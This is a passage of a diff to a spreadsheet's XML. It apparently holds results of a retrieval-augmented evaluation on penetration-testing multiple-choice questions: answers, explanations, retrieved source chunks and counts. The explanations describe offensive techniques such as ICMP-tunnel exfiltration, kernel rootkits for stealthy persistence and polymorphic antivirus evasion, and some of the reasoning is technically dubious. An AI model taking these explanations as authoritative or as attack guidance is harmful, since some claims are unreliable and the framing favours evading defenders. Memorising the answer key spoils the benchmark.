 suryanshp1-kali-linux-pentesting-data.md (Chunk: 002652fc-c1a5-4fb0-bd3a-9ef831cb0dca, Type: dense, Rank: 3)
 suryanshp1-kali-linux-pentesting-data.md (Chunk: 656c8494-1607-4389-ad99-cb7a22a61f5f, Type: dense, Rank: 4)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 4108dc91-f726-4717-8c41-5374653b5749, Type: dense, Rank: 5)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 5b5db436-b4dc-45b7-8932-f9b0ee716fb8, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 830142da-9e35-4e79-98ea-6eaa7a78fec1, Type: dense, Rank: 7)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 17f94819-48bb-4a9c-b1f5-0f9f88c30658, Type: dense, Rank: 8)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 3c59efec-aece-45e3-aca3-adcffe36d561, Type: sparse, Rank: 9)
-suryanshp1-kali-linux-pentesting-data.md (Chunk: 015f2406-4ff4-4680-841a-81a58a919933, Type: dense, Rank: 10)</t>
+suryanshp1-kali-linux-pentesting-data.md (Chunk: 4108dc91-f726-4717-8c41-5374653b5749, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I20" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J20" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K20" t="inlineStr">
         <is>
@@ -1794,7 +1707,7 @@
       <c r="F21" t="inlineStr">
         <is>
           <t>Answer: Metasploit Framework
-Explanation: The Metasploit Framework is the correct choice because it is a widely-used platform for developing and executing exploit code against a remote target machine. It provides users with the ability to craft, test, and execute payloads in a controlled and modular fashion, which is crucial for successful exploitation in a red team scenario. While Wireshark is primarily a network protocol analyzer, Burp Suite is predominantly utilized for web application security testing, and SQLmap automates the process of detecting and exploiting SQL injection flaws, these tools are not as effective for advanced payload crafting and exploitation during an assessment compared to Metasploit Framework.</t>
+Explanation: The Metasploit Framework is the correct choice because it is a widely-used platform for developing and executing exploit code against a remote target machine. It provides users with the ability to craft, test, and execute payloads in a controlled and modular fashion, which is crucial for successful exploitation in a red team scenario. On the other hand, Wireshark is primarily a network protocol analyzer, and while useful for understanding network communications and troubleshooting, it does not facilitate payload crafting or exploitation. Burp Suite is predominantly utilized for web application security testing, not for crafting software-based exploit payloads. SQLmap automates the process of detecting and exploiting SQL injection flaws, but it isn't suited for the broader range of payload crafting required in most red team operations.</t>
         </is>
       </c>
       <c r="G21" t="inlineStr">
@@ -1808,21 +1721,16 @@
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 94a5825c-3c24-4426-98b6-0f15dd480b28, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ac23a721-e803-4c69-b27a-a7067798ea01, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: f409a119-1bfa-4cf3-8cb8-c081f05be00d, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 140bf297-3b8f-4cda-8b62-a97281432e55, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: c8091472-5f13-4fd4-b42f-775d8b5720af, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I21" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J21" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K21" t="inlineStr">
         <is>
@@ -1875,21 +1783,16 @@
 preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 28b5b162-5fe3-4694-ab70-f2cc135754de, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I22" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J22" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K22" t="inlineStr">
         <is>
@@ -1928,7 +1831,7 @@
       <c r="F23" t="inlineStr">
         <is>
           <t>Answer: Buffer overflow
-Explanation: Buffer overflow vulnerabilities are commonly exploited for remote code execution, where an attacker sends inputs that are deliberately crafted to exceed the buffer's allocation size. This can overwrite adjacent memory locations, potentially allowing arbitrary code execution if carefully manipulated. Zero-day exploits refer to vulnerabilities unknown to parties other than the attackers and may involve various types of weaknesses, not specifically buffer overflows. SQL injection and Cross-site scripting (XSS) are different classes of vulnerabilities primarily associated with web applications and deal with injecting malicious SQL code and scripts, respectively, rather than exploiting memory corruption issues.</t>
+Explanation: Buffer overflow vulnerabilities are commonly exploited for remote code execution, where an attacker sends inputs that are deliberately crafted to exceed the buffer's allocation size. This can overwrite adjacent memory locations, potentially allowing arbitrary code execution if carefully manipulated. Zero-day exploits refer to vulnerabilities unknown to parties other than the attackers, and may involve various types of weaknesses, not specifically buffer overflows. SQL injection and Cross-site scripting (XSS) are different classes of vulnerabilities primarily associated with web applications and deal with injecting malicious SQL code and scripts, respectively, rather than exploiting memory corruption issues.</t>
         </is>
       </c>
       <c r="G23" t="inlineStr">
@@ -1942,21 +1845,16 @@
 preemware_pentestingeval.pdf (Chunk: 36e54dab-ab32-4509-abd8-e70613c1ce77, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e40e4c76-2816-4f1b-b4a9-e43d8e206282, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 884a29d4-07cf-44d8-bf3a-5149b2c69f9a, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 866bc2f2-6f4f-4d94-9bf5-c5a8241abd5e, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I23" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J23" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K23" t="inlineStr">
         <is>
@@ -1995,7 +1893,7 @@
       <c r="F24" t="inlineStr">
         <is>
           <t>Answer: Configuration files with weak permissions
-Explanation: Configuration files with weak permissions are often a goldmine for red team operations because they can contain sensitive information about the network setup, credentials, and other critical data that can be exploited to gain deeper insights into internal network configurations. While outdated antivirus signatures and open network ports may provide some level of insight, debugging and logging settings typically do not reveal as much detailed information about the network configuration.</t>
+Explanation: Exploiting configuration files with weak permissions is most likely to provide the deepest insight into internal network configurations when exploited. These files often contain sensitive information about the network setup, credentials, and other critical data that can be used to gain a deeper understanding of the target network's infrastructure. Debugging and logging settings may provide some insights, but they are less likely to reveal as much information as configuration files with weak permissions. Outdated antivirus signatures and open network ports are more related to specific security measures rather than providing deep insight into internal network configurations.</t>
         </is>
       </c>
       <c r="G24" t="inlineStr">
@@ -2009,21 +1907,16 @@
 preemware_pentestingeval.pdf (Chunk: aebf1bc1-657b-4a4c-836d-12a9f04a6ccb, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3c3355f4-4b92-4733-bfd3-317df7d2ffca, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: d22b9072-ae36-4b82-a5d7-9a7768f79cdd, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 53d92d7b-c5d1-4bbd-bdf4-b29c029a1b9e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 73d10db3-dede-40c2-a481-2183afa5e843, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I24" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J24" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K24" t="inlineStr">
         <is>
@@ -2062,7 +1955,7 @@
       <c r="F25" t="inlineStr">
         <is>
           <t>Answer: Memory corruption via integer overflow
-Explanation: Memory corruption via integer overflow is often used to bypass ASLR when exploiting a remote server. ASLR makes it difficult for attackers by randomizing the memory address space of process sections, such as the stack and heap, which can make it harder to predict where code or data will be loaded in memory. However, integer overflow vulnerabilities can lead to memory corruption that allows an attacker to control the memory layout and potentially bypass ASLR protections.</t>
+Explanation: Memory corruption via integer overflow is often used to bypass ASLR when exploiting remote servers. ASLR makes it difficult for attackers by randomizing the memory address space of process sections, such as .text and .data, at runtime. However, integer overflow can be used to manipulate memory locations and bypass this security feature. This technique takes advantage of vulnerabilities in software that allow an attacker to cause a program to read or write data outside its intended boundaries, potentially leading to code execution.</t>
         </is>
       </c>
       <c r="G25" t="inlineStr">
@@ -2076,21 +1969,16 @@
 preemware_pentestingeval.pdf (Chunk: 5f1aed82-6985-429f-a6a1-e86bd394b0ff, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: b09ec26e-5654-4c4b-bb3a-f02c97266fbc, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: da05222e-12f4-464d-a4cf-e755c02cdecf, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: dense, Rank: 6)
-cowWhySo-pentest-redteam-steering.md (Chunk: 161bbefa-f921-4138-90fe-7697803bdba8, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d299dde0-8cde-40ef-988a-6582c6a85a86, Type: dense, Rank: 8)
-rop-return-oriented-programming.md (Chunk: f7923ee6-edf7-4858-8b01-3be18b188df6, Type: sparse, Rank: 9)
-cowWhySo-pentest-redteam-steering.md (Chunk: 072e1153-c8f2-44d2-b09b-af0c695f2650, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 5bc0c5a7-4292-4658-a0ec-676d6c743ab8, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I25" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J25" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K25" t="inlineStr">
         <is>
@@ -2143,21 +2031,16 @@
 preemware_pentestingeval.pdf (Chunk: da8d5790-4c9c-4230-96d7-cd1f71b7c89c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 4dec9ffa-64db-4e01-93c9-05970e09eb32, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 48095558-19bb-4a42-9c2f-c85be495918f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I26" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J26" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K26" t="inlineStr">
         <is>
@@ -2210,21 +2093,16 @@
 preemware_pentestingeval.pdf (Chunk: 076aff09-3415-41ea-8059-a0f52827a57d, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a70f6200-1dd0-4d5f-8b64-aa88d40f5e5e, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4f2b8ecd-a7ee-4877-8c74-4b0c764a70d0, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f7e2fa45-f6cc-4891-874c-6a9fc73e7701, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 3342a1f7-6035-41e2-b639-fe04c612dd59, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I27" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J27" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K27" t="inlineStr">
         <is>
@@ -2263,7 +2141,7 @@
       <c r="F28" t="inlineStr">
         <is>
           <t>Answer: Using a customized ICMP tunneling protocol
-Explanation: Using a customized ICMP tunneling protocol is the most effective technique for exfiltrating data from a highly secured network without alerting traditional security tools. This method exploits the fact that many security measures overlook ICMP traffic, considering it benign. Unlike HTTP GET requests, which could be monitored and blocked by web proxies and security gateways, ICMP tunneling leverages the less scrutinized ICMP protocol to transfer data outside the network in an obfuscated manner.</t>
+Explanation: Using a customized ICMP tunneling protocol is the most effective technique for exfiltrating data from a highly secured network without alerting traditional security tools. This method exploits the fact that many security systems overlook ICMP traffic, considering it benign. Unlike HTTP GET requests, which could be monitored and blocked by web proxies and security gateways, ICMP tunneling uses the less scrutinized ICMP protocol to transfer data outside the network in an obfuscated manner. Sending a phishing email with an attachment might not be relevant in highly secured environments where users are trained and email security is robust. Exploiting an SQL injection vulnerability is primarily an attack vector into a system, rather than a method for stealthy data exfiltration.</t>
         </is>
       </c>
       <c r="G28" t="inlineStr">
@@ -2277,21 +2155,16 @@
 preemware_pentestingeval.pdf (Chunk: 14414ef5-9e13-47ac-a19f-40ad5e82b1c0, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: ca893e36-a461-4463-8cb1-5a118bc61c7f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I28" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J28" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K28" t="inlineStr">
         <is>
@@ -2330,7 +2203,7 @@
       <c r="F29" t="inlineStr">
         <is>
           <t>Answer: Injecting code directly into the stack during a buffer overflow
-Explanation: Injecting code directly into the stack during a buffer overflow is the most effective way among the given options to execute arbitrary code on a remote system without prior authentication. This technique involves exploiting a buffer overflow vulnerability, which typically occurs when data exceeds a buffer's capacity, leading to the execution of malicious code supplied by the attacker. Option 0, tampering with DLL dependencies to redirect execution flow is a separate aspect of exploit development and is more about access than reliability across systems. Employing web form SQL injection to manipulate database queries is a technique for data exfiltration rather than executing arbitrary code on the remote system. Exploiting cross-site scripting vulnerabilities in session handling primarily affects client-side security, not the execution of arbitrary code on the remote server.</t>
+Explanation: Injecting code directly into the stack during a buffer overflow is the most effective way among the given options to execute arbitrary code on a remote system without prior authentication. This technique involves exploiting a buffer overflow vulnerability, which typically occurs when data exceeds a buffer's capacity, leading to the execution of malicious code supplied by the attacker. Option 0, tampering with DLL dependencies to redirect execution flow, is not as effective in this context because it requires prior knowledge of the system and does not guarantee successful arbitrary code execution. Exploiting cross-site scripting vulnerabilities in session handling can lead to hijacking user sessions or defacing websites but does not directly allow executing arbitrary code on a remote system without authentication. Using web form SQL injection to manipulate database queries is primarily an attack vector into a system, rather than a method for stealthy data exfiltration.</t>
         </is>
       </c>
       <c r="G29" t="inlineStr">
@@ -2344,21 +2217,16 @@
 preemware_pentestingeval.pdf (Chunk: 446c016e-ab1a-45cc-bba8-04d6c3f76454, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 53e5bc02-bd2f-46bf-ad66-9a3bdbeb1634, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 0b679bf7-8b92-45d3-bff1-b51eaa493d7f, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 86786a50-15b5-4c14-be3b-c67e3d167f6c, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: dccd4c32-0780-4b80-8997-5b0089e63b5e, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 11f1623f-812b-4ee5-82d3-4f85dcd656de, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: b28d496d-a5a2-41f1-a542-c1345b6b7e18, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 0e11e254-3f93-43ce-822e-5e1a01bd968b, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I29" t="inlineStr">
         <is>
-          <t>Semantic: 4, Keyword: 6, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J29" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K29" t="inlineStr">
         <is>
@@ -2397,7 +2265,7 @@
       <c r="F30" t="inlineStr">
         <is>
           <t>Answer: Heap spraying
-Explanation: In an advanced persistent threat (APT) scenario, the most effective technique for gaining persistent access to a target system after initial exploitation is heap spraying. This method involves preparing a large segment of memory with malicious shellcode in anticipation of a vulnerability allowing the execution of memory content. By carefully controlling the layout of the heap and positioning the shellcode within it, an attacker can ensure that the vulnerable code executes their payload when triggered, granting them persistent access to the system. While ROP chains, DLL hijacking, and phishing attacks are also potential techniques in APT scenarios, heap spraying is particularly effective for maintaining long-term access without immediate detection.</t>
+Explanation: In an advanced persistent threat (APT) scenario, the most effective technique for gaining persistent access to a target system after initial exploitation is heap spraying. This method involves manipulating the memory layout of the target application in such a way that it creates a predictable pattern or "spray" of objects in the heap. The attacker can then craft an exploit that triggers a vulnerability, such as a buffer overflow, and places their malicious code at a known location within this predictable pattern. This allows the attacker to reliably execute their payload and maintain persistent access to the system. While ROP chains and DLL hijacking can also be effective techniques in certain scenarios, they are less reliable than heap spraying for gaining long-term access. Phishing attacks may provide initial access but do not directly lead to code execution on the target system.</t>
         </is>
       </c>
       <c r="G30" t="inlineStr">
@@ -2411,21 +2279,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I30" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J30" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K30" t="inlineStr">
         <is>
@@ -2464,16 +2327,7 @@
       <c r="F31" t="inlineStr">
         <is>
           <t>Answer: Using a kernel-mode rootkit to bypass operating system security controls
-Explanation: In the context of a targeted attack against a corporate network, using a kernel-mode rootkit to
-bypass operating system security controls is the most effective method for maintaining persistent access to a
-server without immediate detection. Kernel-mode rootkits operate at a low level within the system architecture,
-allowing them to manipulate core system functions, hide their existence from traditional security software, and
-resist removal efforts. This choice is strategic in a scenario requiring stealth and long-term access. Utilizing
-phishing emails to distribute ransomware, while effective for immediate disruptions, does not typically establish
-long-term access and is more detectable. Exploiting a zero-day vulnerability in a third-party software library can
-provide initial access but doesn't inherently provide persistent access or stealth. Performing a man-in-the-middle
-attack on a secured Wi-Fi network may allow for interception of data, but it does not guarantee long-term access
-or persistence on the server itself.</t>
+Explanation: In the context of maintaining persistent access to a server without immediate detection, using a kernel-mode rootkit is the most effective technique. Kernel-mode rootkits operate at a low level within the system architecture, allowing them to manipulate core system functions and hide their existence from traditional security software. This makes it difficult for the target network to detect the presence of the rootkit and provides a stealthy method for maintaining long-term access. While exploiting a zero-day vulnerability can provide initial access, it does not inherently facilitate prolonged access. Utilizing phishing emails to distribute ransomware is effective for immediate disruptions but does not typically establish long-term access. Performing a man-in-the-middle attack on a secured Wi-Fi network may allow interception of data but does not guarantee persistent access to the server.</t>
         </is>
       </c>
       <c r="G31" t="inlineStr">
@@ -2487,21 +2341,16 @@
 preemware_pentestingeval.pdf (Chunk: 907956f7-9612-4247-81ec-4ad665e45276, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: fe2d631f-fdd5-45c1-9060-0105f0235b78, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I31" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J31" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K31" t="inlineStr">
         <is>
@@ -2540,7 +2389,7 @@
       <c r="F32" t="inlineStr">
         <is>
           <t>Answer: Evading antivirus software using polymorphic code
-Explanation: Evading antivirus software using polymorphic code poses a significant challenge to static analysis methods because it involves malware that changes its underlying code without altering its functionality. This process, often done through techniques such as encryption or varying encryption algorithms, effectively changes the binary's signature every time it replicates or is executed. This continuous change makes it difficult for static analysis tools, which typically rely on known signatures, to identify and classify the malware accurately. In contrast, binary obfuscation techniques and the utilization of standard networking ports involve different aspects of hiding and exfiltration but do not inherently involve changes to the binary's code or signature in the context described for polymorphism. Advanced persistent threats describe a broad approach targeting specific entities with various tools and strategies over an extended period, which does not directly pertain to the challenge of altering signatures in static analysis.</t>
+Explanation: Evading antivirus software using polymorphic code poses a significant challenge to static analysis methods because it involves malware that changes its underlying code without altering its functionality. This process, often done through techniques such as encryption or varying encryption algorithms, effectively changes the binary's signature every time it replicates or is executed. This continuous change makes it difficult for static analysis tools, which typically rely on known signatures, to identify and classify the malware accurately. In contrast, binary obfuscation techniques and the utilization of standard networking ports involve different aspects of hiding and exfiltration but do not inherently involve changes to the binary's code or signature in the context described for polymorphism. Advanced persistent threats (APTs) describe a broad approach targeting specific entities with various tools and strategies over an extended period, which does not directly pertain to the challenge of altering signatures in static analysis.</t>
         </is>
       </c>
       <c r="G32" t="inlineStr">
@@ -2554,21 +2403,16 @@
 preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: e6fb6d20-9ca3-4e39-a088-85ce208330ed, Type: dense, Rank: 3)
